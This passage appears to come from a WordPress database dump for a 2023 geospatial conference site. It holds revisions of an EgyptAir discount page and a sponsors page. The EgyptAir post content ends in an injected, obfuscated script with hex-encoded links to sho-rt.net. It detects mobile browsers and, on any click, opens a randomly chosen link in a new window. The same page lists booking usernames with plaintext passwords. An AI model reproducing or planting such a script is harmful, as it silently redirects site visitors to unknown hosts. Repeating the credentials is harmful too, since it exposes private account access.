)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','EGYPTAIR','','inherit','closed','closed','','4804-revision-v1','','','2023-06-24 01:46:32','2023-06-24 01:46:32','',4804,'https://gsw2023.com/?p=4806',0,'revision','',0),
(4807,1,'2023-06-24 01:49:31','2023-06-24 01:49:31','<p>[vc_row][vc_column][vc_column_text]</p>\n<p><!-- wp:paragraph -->Good day,</p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph -->​Kindly find hereunder link </p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph -->- Appreciate your kind support to direct users to login through:</p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph -->- Link:  <a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noreferrer noopener\">https://bit.ly/3HLQBrB</a>  </p>\n<!-- /wp:paragraph -->\n<!-- wp:table -->\n<figure class=\"wp-block-table\">\n<table border=\"0\" width=\"100%\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td>\n<p><strong>UserName</strong></p>\n</td>\n<td>\n<p><strong>Password</strong></p>\n</td>\n</tr>\n<tr>\n<td>\n<p>ARABIAN AC#1</p>\n</td>\n<td>\n<p>3Tt#4Hc0</p>\n</td>\n</tr>\n<tr>\n<td>\n<p>ARABIAN AC#2</p>\n</td>\n<td>\n<p>7Hi#4Ph2</p>\n</td>\n</tr>\n<tr>\n<td>\n<p>ARABIAN AC#3</p>\n</td>\n<td>\n<p>0Lx_0Py7</p>\n</td>\n</tr>\n<tr>\n<td>\n<p>ARABIAN AC#4</p>\n</td>\n<td>\n<p>6Cq_1Gl4</p>\n</td>\n</tr>\n<tr>\n<td>\n<p>ARABIAN AC#5</p>\n</td>\n<td>\n<p>2Ns_4Nn7</p>\n</td>\n</tr>\n</tbody>\n</table>\n</figure>\n<!-- /wp:table -->\n<p><!-- wp:paragraph -->​​​</p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph --><strong>* Make sure to guide users to select Egypt from the country menu, then enter given username &amp; password and proceed with their bookings.</strong></p>\n<!-- /wp:paragraph -->\n<p>&nbsp;</p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','EGYPTAIR','','inherit','closed','closed','','4804-revision-v1','','','2023-06-24 01:49:31','2023-06-24 01:49:31','',4804,'https://gsw2023.com/?p=4807',0,'revision','',0),
(4808,1,'2023-06-24 01:49:45','2023-06-24 01:49:45','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687570910477{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>&nbsp;[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571313710{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]To get Password[/dt_default_button][vc_separator 